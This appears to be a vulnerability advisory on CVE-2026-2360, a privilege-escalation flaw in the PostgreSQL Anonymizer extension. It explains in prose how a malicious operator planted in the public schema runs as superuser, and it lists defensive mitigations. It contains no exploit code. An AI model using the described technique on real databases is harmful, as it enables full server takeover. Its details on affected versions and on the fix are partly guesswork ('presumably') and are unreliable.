The vulnerability identified as CVE-2026-2360 affects the DALIBO PostgreSQL Anonymizer extension, specifically version 1. It arises from an uncontrolled search path element that allows an attacker with certain privileges to escalate to superuser by creating a malicious custom operator in the public schema. When the extension is created, this operator is executed with superuser privileges, enabling arbitrary code execution at the highest privilege level. The risk is particularly pronounced in PostgreSQL 14 or instances upgraded from PostgreSQL 14 or earlier, where the public schema retains CREATE permissions for non-superusers, facilitating the attack vector. PostgreSQL 15 and later versions mitigate this risk by revoking CREATE permissions on the public schema by default, but the vulnerability remains exploitable if a superuser adds a schema to their search_path and grants CREATE privileges to untrusted users, which is against recommended best practices. The vulnerability impacts confidentiality, integrity, and availability by allowing full control over the database server. The issue is resolved in PostgreSQL Anonymizer version 3.0.1 and later, which presumably implements stricter schema permission controls and validation to prevent malicious operator creation. The CVSS v3.1 score of 8.0 reflects the high impact and complexity of the attack, requiring high privileges but no user interaction. No known exploits have been reported in the wild, but the vulnerability poses a significant risk if exploited.

For European organizations, this vulnerability could lead to complete compromise of PostgreSQL database servers running the affected PostgreSQL Anonymizer extension version 1, especially on PostgreSQL 14 or upgraded instances. Attackers gaining superuser privileges could exfiltrate sensitive data, alter or destroy data integrity, disrupt availability, and potentially pivot to other internal systems. This is particularly critical for sectors with stringent data protection requirements such as finance, healthcare, and government institutions across Europe. The ability to execute arbitrary code with superuser privileges undermines trust in data anonymization processes, potentially exposing personal data that was intended to be protected. The impact is exacerbated in multi-tenant environments or cloud-hosted PostgreSQL instances where privilege boundaries are crucial. Organizations that have upgraded to PostgreSQL 15 or later but have misconfigured schema permissions remain at risk. The lack of known exploits in the wild suggests limited immediate threat but does not diminish the potential severity if exploited.

European organizations should immediately upgrade the PostgreSQL Anonymizer extension to version 3.0.1 or later to remediate this vulnerability. Review and harden schema permissions by ensuring that the public schema does not grant CREATE privileges to non-superusers, especially on PostgreSQL 14 or upgraded instances. Avoid adding custom schemas with CREATE privileges for untrusted users in the search_path. Implement strict role-based access controls limiting who can create operators or extensions. Regularly audit database roles and permissions to detect misconfigurations. Employ monitoring and alerting for unusual extension creation or operator definition activities. Consider isolating critical databases and applying network segmentation to limit exposure. Finally, maintain up-to-date backups and test recovery procedures to mitigate potential data loss from exploitation.